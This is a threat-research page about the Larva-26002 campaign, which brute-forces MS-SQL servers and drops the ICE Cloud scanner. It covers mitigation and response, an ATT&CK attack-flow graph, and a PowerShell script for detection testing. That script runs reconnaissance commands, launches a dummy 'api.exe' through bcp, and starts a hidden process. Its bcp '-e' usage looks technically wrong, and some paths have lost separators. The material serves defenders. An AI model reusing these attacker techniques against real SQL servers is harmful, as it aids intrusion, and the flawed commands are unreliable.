Malware Attack Targeting MS‑SQL Servers to Deploy the ICE Cloud Scanner (Larva-26002)

Ruslan Mikhalov Chief of Threat Research at SOC Prime

Malware Attack Targeting MS‑SQL Servers to Deploy the ICE Cloud Scanner (Larva-26002)

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

The Larva-26002 threat actor repeatedly targets exposed MS-SQL servers through brute-force attacks. Once access is obtained, the attacker uses tools such as BCP, Curl, or Bitsadmin to download and write a Go-based scanner known as ICE Cloud Client. This scanner connects to a command-and-control server, receives credentials for additional SQL servers, and can ultimately facilitate deployment of ransomware families such as Trigona or Mimic.

Investigation

AhnLab documented abuse of the BCP utility to extract a malicious binary from a database table and save it as C:\\ProgramData\\api.exe. The researchers also observed alternative download methods using Curl and Bitsadmin. The ICE Cloud Launcher then authenticates to its C2 server, retrieves target lists and credentials, and begins brute-forcing other SQL servers. The campaign also introduced remote access tools such as AnyDesk and Teramind.

Mitigation

Organizations should require strong, unique passwords for SQL accounts, prevent internet-facing SQL services, and tightly restrict RDP access. SQL Server and related components should be fully patched, while security teams monitor for unusual use of BCP, Curl, or Bitsadmin. Network segmentation and intrusion detection should also be used to identify suspicious outbound communication to known malicious infrastructure.

Response

If this activity is detected, isolate the affected host, preserve forensic artifacts such as api.exe and command history, and search the environment for similar BCP or downloader behavior. Block the malicious IPs and domains, reset compromised SQL credentials, and remove any deployed remote administration tools. A full incident response review should then determine whether ransomware staging or deployment has occurred.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#cccccc classDef malware fill:#ff9999 classDef operator fill:#ff9900 %% Nodes action_initial_access["Action – T1110.003 Brute Force: Password Spraying Attacker brute forces exposed MSu2011SQL services to obtain credentials."] class action_initial_access action tool_mssql["Tool – Name: Microsoft SQL Server Purpose: Target service for credential theft"] class tool_mssql tool tech_valid_accounts["Technique – T1078 Valid Accounts Use of obtained credentials to log into SQL servers"] class tech_valid_accounts technique tech_cmd_shell["Technique – T1059.003 Windows Command Shell Execute system commands (hostname, whoami, ifconfig, netstat, tasklist)"] class tech_cmd_shell technique tech_network_config["Technique – T1016 System Network Configuration Discovery"] class tech_network_config technique tech_network_conn["Technique – T1049 System Network Connections Discovery"] class tech_network_conn technique tech_process_disc["Technique – T1057 Process Discovery"] class tech_process_disc technique tool_curl["Tool – Name: curl Purpose: Download malicious payload"] class tool_curl tool tool_bitsadmin["Tool – Name: bitsadmin Purpose: Download malicious payload"] class tool_bitsadmin tool tool_bcp["Tool – Name: BCP (Bulk Copy Program) Purpose: Export binary data to create api.exe"] class tool_bcp tool tech_masquerade["Technique – T1036.003 Masquerading: Rename System Utilities Payload disguised as a legitimate program"] class tech_masquerade technique malware_api["Malware – Name: api.exe Function: ICE Cloud Launcher C2 agent"] class malware_api malware tech_c2_web["Technique – T1071.001 Web Protocols C2 communication over HTTP"] class tech_c2_web technique tech_c2_websvc["Technique – T1102.002 Web Service: Dead Drop Resolver"] class tech_c2_websvc technique action_lateral_movement["Action – T1078 Valid Accounts Use credentials to authenticate to additional MSSQL servers"] class action_lateral_movement action tech_exploit_remote["Technique – T1210 Exploitation of Remote Services Port forwarding or RDP for lateral movement"] class tech_exploit_remote technique tool_anydesk["Tool – Name: AnyDesk Purpose: Remote control"] class tool_anydesk tool tool_teramind["Tool – Name: Teramind Purpose: Remote monitoring"] class tool_teramind tool action_data_exfil["Action – Data Collection & Exfiltration Scanning and exfiltration of configuration data"] class action_data_exfil action %% Connections action_initial_access –>|targets| tool_mssql tool_mssql –>|enables| tech_valid_accounts tech_valid_accounts –>|allows| tech_cmd_shell tech_cmd_shell –>|gathers| tech_network_config tech_cmd_shell –>|gathers| tech_network_conn tech_cmd_shell –>|gathers| tech_process_disc tech_cmd_shell –>|downloads payload using| tool_curl tech_cmd_shell –>|downloads payload using| tool_bitsadmin tech_cmd_shell –>|uses| tool_bcp tool_bcp –>|creates| malware_api malware_api –>|masquerades as| tech_masquerade malware_api –>|communicates via| tech_c2_web malware_api –>|uses| tech_c2_websvc malware_api –>|enables| action_lateral_movement action_lateral_movement –>|leverages| tech_exploit_remote tech_exploit_remote –>|installs| tool_anydesk tech_exploit_remote –>|installs| tool_teramind tool_anydesk –>|facilitates| action_data_exfil tool_teramind –>|facilitates| action_data_exfil "

Attack Flow

Attack Narrative & Commands:
1. Reconnaissance on the compromised SQL host – The attacker enumerates host identity and active network interfaces using hostname and netstat -an.
2. Lateral‑movement preparation – The attacker lists running processes to verify that sqlservr.exe is present, confirming the target is a SQL server.
3. Malware download via native utility – Using bcp.exe, the attacker abuses the utility’s ability to invoke an external program (-e switch) to download a malicious payload (api.exe) from a remote C2 server.
4. Execution of the payload – The downloaded api.exe is launched, establishing persistence.

Regression Test Script: (PowerShell – fully self‑contained)

# ------------------------------------------------------------
# Simulated attack against a Windows SQL Server host
# ------------------------------------------------------------
$tempDir = "$env:TEMPlarva26002"
New-Item -Path $tempDir -ItemType Directory -Force | Out-Null

# 1. System information gathering (triggers selection_info)
hostname
whoami
netstat -an
tasklist /FI "IMAGENAME eq sqlservr.exe" /FO CSV /NH

# 2. Download malicious payload using BCP (triggers selection_malware)
# Simulate a remote file by creating a dummy exe locally
$maliciousExe = "$tempDirapi.exe"
Set-Content -Path $maliciousExe -Value "FakeMalware" -Encoding ASCII

# BCP command that calls the "api.exe" via the -e switch (execution of external program)
$bcpCmd = @"
bcp "SELECT TOP (1) name FROM master.dbo.spt_values" queryout NUL -c -t, -S localhost -T -e "$maliciousExe"
"@
Invoke-Expression $bcpCmd

# 3. Execute the payload (additional observable process)
Start-Process -FilePath $maliciousExe -WindowStyle Hidden

# Cleanup delay (allow SIEM to ingest)
Start-Sleep -Seconds 10

Cleanup Commands:

# Remove temporary files and stop any lingering fake process
Stop-Process -Name "api" -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMPlarva26002" -Recurse -Force

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free